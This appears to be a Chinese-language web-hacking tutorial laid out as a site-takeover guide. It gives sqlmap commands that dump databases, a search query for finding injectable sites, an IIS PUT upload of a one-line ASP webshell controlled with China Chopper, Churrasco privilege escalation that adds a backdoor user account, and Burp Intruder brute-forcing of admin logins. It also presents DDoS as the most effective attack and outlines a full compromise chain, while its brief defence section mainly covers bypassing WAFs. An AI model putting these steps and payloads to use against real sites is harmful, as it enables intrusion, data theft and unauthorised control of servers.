web安全包括：（下面所有用到的工具都可以在网站页面右侧的“HK攻防”群里下载（群号码：663623818），欢迎加入一起学习）

1. web安全简介
2. sql注入
3. 上传漏洞的利用
4. 网站后台暴力破解
5. 跨站脚本攻击（仅原理）
6. 网站安全防护

web安全简介

1. 什么是服务器
也称伺服器，是提供计算服务的设备。
2. 域名和ip
一个ip可以绑定好几个网站（vps）
ping一个网站的域名就会得到一个ip地址
如在dos中：ping www.baidu.com
3. web漏洞类型
网站本身漏洞，软件漏洞，服务器漏洞，外部攻击
4. 拿站思路
先从通用型入手，sql注入。xss。旁注。上传漏洞。
5. 目前最常用方法
最有效：外部攻击DDoS，直接干掉服务器。sql注入，跨站式脚本攻击。

sql注入

1.sql是什么
sql就是数据库，用来存取东西

2.sql注入是什么
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。
3.检测漏洞存在和选择工具（sqlmap）（查询注入点： inurl:.php?id= ）
4.注入步骤（练手：http://ctf5.shiyanbar.com/8/index.php?id=1）
kali中使用sqlmap工具（查出它的服务器和数据库版本就代表有漏洞）
1.找注入点并检测 sqlmap –u “链接”
2.列库（显示数据库） sqlmap –u “链接” –dbs
3.列表（显示其中的表） sqlmap –u “链接” –D 数据库 –tables
4.列字段（显示表中字段）sqlmap –u “链接” –D 数据库 –T 表名 –columns
5.爆内容（显示字段内容） sqlmap –u “链接” –D 数据库 –T 表名 –C 字段 –dump

上传漏洞利用

需要下载好IISPutScanner和中国菜刀配套完整工具

1.配置环境
服务器windows server 2003 sp1 网站服务 IIS 6.0 7.0 权限需要足够大
在本站中有介绍：链接http://www.zchaohome.com/hkgfwebsite/

2.扫描存在此漏洞的网站
直接利用工具IISPutScanner扫描，如果结果显示ok则证明存在此漏洞，用iiswrite进行写入
运行IISPutScanner，设置ip范围，如192.168.254.120-192.168.254.140
运行iiswrite，选择PUT，输入网站ip：192.168.254.139，选择一句话木马（asp文件，内容为<%eval request(“chopper”)%>），提交
继续选择COPY，提交
3.利用利用工具上传一句话木马
利用iiswrite工具上传一句话木马，利用网站提交，或者用sql注入获取到的网站管理员身份上传，木马内容：<%eval request(“chopper”)%>
4.链接并使用中国菜刀
利用中国菜刀上传cmdd.exe，并且上传Churrasco。利用中国菜刀打开虚拟终端，然后使用churrasco对cmd命令进行使用。
步骤：
打开中国菜刀，输入网址：http：//192.168.254.139/shell.asp 和密码为chopper
进入网站目录，在wwwroot中上传cmdd.exe和Churrasco
在初始界面右键打开虚拟终端，用命令操作，设置cmd的目录，获取权限
SETP C:\inetpub\wwwroot\cmdd.exe
用dir查看目录
用 churrasco “net user hk 123456 /add” 创建一个用户

5.提权

网站后台暴力破解

1. 利用工具扫描后台敏感目录
扫描工具：御剑后台扫描工具（自己百度）找到admin后台页面
2. 找到登录入口利用burpsuite进行破解
burpsuite在kali中有集成，需要一个靠谱的字典，可以自己生成，可以搜。
最好想办法知道对方的id，如果id不知道，那么破解难度将会加大。

运行burpsuite，选择Proxy
添加IP地址，127.0.0.1 端口8008
在浏览器中设置代理，Http Proxy：127.0.0.1 Port：8008
用burpsuite进行监听，只要管理员登陆会在burpsuite中进行抓包，可以查看相关信息
暴力破解密码：选择Intruder，将包发送给Intruder处理，设置Payloads，自己设置可能的密码，或者选择靠谱的字典破解
选择options，点击Start attack开始破解，观察包的length和其他的包不同的，有可能为真正的密码

3. 暴力破解的受限之处
如果有验证码是很难办的，简单的可以跳过。

跨站脚本攻击（仅原理）

1. 什么是xss（跨站脚本攻击）
跨站脚本攻击(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。
2.这个和拿站基本无关，主要是攻击用户或者管理员
3.拿到cookie利用
4. 修改cookie取消推广

网站安全防护

在windows系统中下载AppServ并安装，windows系统就变成了服务器
在地址栏中网址后面加入 and 1=1 测试是否有漏洞
1. 首先安装WAF（安全狗、360网站卫士）www.safedog.cn
2. 学会WAF配置及其规则，学会绕过
3. 有些老漏洞不如不用，直接用nessus扫描然后用漏洞攻击
4. 对于DDoS攻击（攻击方法先不讲），利用CDN和负载均衡防范。
5. 拿站的整个思路
注入（过狗，旁注）-> 上传漏洞（挂小马、传大马） -> 弱口令（后台或者软件、数据库等等口令） -> 服务器或者软件漏洞利用 -> DDoS攻击
除了最后一项，每一步都需要扫描看看，可能有意想不到的收获。

本文内容由技术讲师董文磊提供支持

更多精彩内容及细节学习：请到网易云课堂董文磊讲师专题学习

网络工程师董文磊

http://study.163.com/provider/1021000286/index.htm